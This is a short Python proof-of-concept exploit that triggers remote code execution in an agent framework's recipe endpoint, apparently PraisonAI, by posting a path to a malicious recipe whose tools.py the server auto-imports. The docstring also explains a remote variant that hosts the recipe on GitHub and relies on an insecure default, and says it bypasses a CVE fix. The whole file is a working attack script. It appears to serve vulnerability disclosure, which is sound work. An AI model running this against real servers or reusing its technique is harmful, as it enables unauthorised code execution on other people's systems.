"""Trigger the unfixed exec_module() sink in templates/tool_override.py.

Sends a single POST to /v1/recipes/run with `recipe` pointing at our
absolute path. The server resolves the path, parses TEMPLATE.yaml, then
calls create_tool_registry_with_overrides(template_dir=<our_path>),
which auto-imports tools.py via spec.loader.exec_module().

Local-path variant (filesystem prerequisite). For the remote variant,
publish evil_recipe/ to GitHub and replace `recipe_path` with
"github:<user>/<repo>/poc-recipe" — exploitable because
SecurityConfig.allow_any_github defaults to True.
"""
import json
import os
import urllib.request

SERVER = "http://127.0.0.1:8765"
recipe_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "evil_recipe"))

req = urllib.request.Request(
    f"{SERVER}/v1/recipes/run",
    data=json.dumps({"recipe": recipe_path}).encode(),
    headers={"Content-Type": "application/json"},
    method="POST",
)
with urllib.request.urlopen(req, timeout=30) as resp:
    body = resp.read().decode()

print(f"[+] HTTP {resp.status}")
print(body)
print()
print(f"[+] Check server stdout for: '[CVE-2026-40287-bypass] RCE fired.'")
print(f"[+] Marker file in {os.path.join(os.environ.get('TEMP', '/tmp'), 'praisonai_pwn_*.txt')}")